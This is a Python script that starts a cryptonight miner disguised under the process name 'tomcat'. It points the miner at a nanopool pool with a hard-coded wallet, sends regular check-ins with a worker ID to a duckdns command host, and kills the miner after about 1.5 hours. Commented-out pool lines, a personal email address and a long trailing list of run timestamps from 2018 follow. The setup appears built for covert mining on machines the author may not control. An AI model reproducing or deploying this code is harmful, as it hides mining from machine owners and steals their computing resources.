import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:08:01.964728
#2018-02-17 16:53:06.881357
#2018-02-17 18:42:05.002486
#2018-02-17 20:32:05.195161
#2018-02-17 22:18:01.817554
#2018-02-18 00:02:05.415093
#2018-02-18 01:52:06.640212
#2018-02-18 03:40:04.133255
#2018-02-18 05:26:04.123472
#2018-02-18 07:18:07.670182
#2018-02-18 09:07:06.924909
#2018-02-18 10:53:05.132326
#2018-02-18 12:40:04.081585
#2018-02-18 14:27:04.134444
#2018-02-18 16:17:03.764413
#2018-02-18 18:06:04.770766
#2018-02-18 19:52:06.860256
#2018-02-18 21:39:01.591380
#2018-02-18 23:27:06.138212
#2018-02-19 01:14:05.471166
#2018-02-19 03:01:04.129592
#2018-02-19 04:47:07.182329
#2018-02-19 06:32:06.141175
#2018-02-19 08:21:03.702569
#2018-02-19 10:11:01.433175
#2018-02-19 11:59:07.999331
#2018-02-19 13:46:09.385721
#2018-02-19 15:35:01.403915
#2018-02-19 17:22:09.190075
#2018-02-19 19:11:08.709232
#2018-02-19 20:58:07.547045
#2018-02-19 22:46:05.759087
#2018-02-20 00:31:06.655211
#2018-02-20 02:18:04.002702
#2018-02-20 04:10:09.178313
#2018-02-20 05:54:07.346844
#2018-02-20 07:39:07.527731
#2018-02-20 09:24:02.123213
#2018-02-20 11:08:08.369140
#2018-02-20 12:54:08.502962
#2018-02-20 14:40:09.938914
#2018-02-20 16:25:12.945580
#2018-02-20 18:11:01.366115
#2018-02-20 20:02:01.760058
#2018-02-20 21:48:06.647590
#2018-02-20 23:29:07.157025
#2018-02-21 01:13:04.079300
#2018-02-21 02:59:02.223607
#2018-02-21 04:47:07.996614
#2018-02-21 06:35:06.232603
#2018-02-21 08:21:14.117894
#2018-02-21 10:06:07.660900
#2018-02-21 11:54:09.451533
#2018-02-21 13:45:04.764285
#2018-02-21 15:29:05.880138
#2018-02-21 17:20:11.037759
#2018-02-21 19:07:09.094902
#2018-02-21 20:55:09.047615
#2018-02-21 22:41:04.575504
#2018-02-22 00:29:07.024269
#2018-02-22 02:17:05.494097
#2018-02-22 04:02:06.705714
#2018-02-22 05:48:04.105258
#2018-02-22 07:34:01.683156
#2018-02-22 09:22:08.232670
#2018-02-22 11:08:02.229278
#2018-02-22 12:54:06.879808
#2018-02-22 14:41:08.112440
#2018-02-22 16:25:13.086643
#2018-02-22 18:11:04.678705
#2018-02-22 20:01:01.306144
#2018-02-22 21:50:01.381155
#2018-02-22 23:36:08.244006
#2018-02-23 01:25:08.523942
#2018-02-23 03:12:08.070199
#2018-02-23 05:00:09.238654
#2018-02-23 06:45:05.844819
#2018-02-23 08:36:08.192450
#2018-02-23 10:51:08.747344
#2018-02-23 12:49:05.727201
#2018-02-23 14:33:01.660759
#2018-02-23 16:22:07.485125
#2018-02-23 18:08:06.928924
#2018-02-23 19:53:06.142124
#2018-02-23 21:36:06.647217
#2018-02-23 23:23:04.156419
#2018-02-24 01:16:08.390672
#2018-02-24 03:07:03.828954
#2018-02-24 04:53:06.756156
#2018-02-24 06:38:07.032113
#2018-02-24 08:28:07.559018
#2018-02-24 10:14:05.102943
#2018-02-24 12:09:05.635829
#2018-02-24 13:57:05.314381
#2018-02-24 15:49:01.890549
#2018-02-24 17:39:05.193464
#2018-02-24 19:24:06.516132
#2018-02-24 21:15:06.589882
#2018-02-24 23:51:05.334626
#2018-02-25 03:09:07.294992
#2018-02-25 07:02:01.449864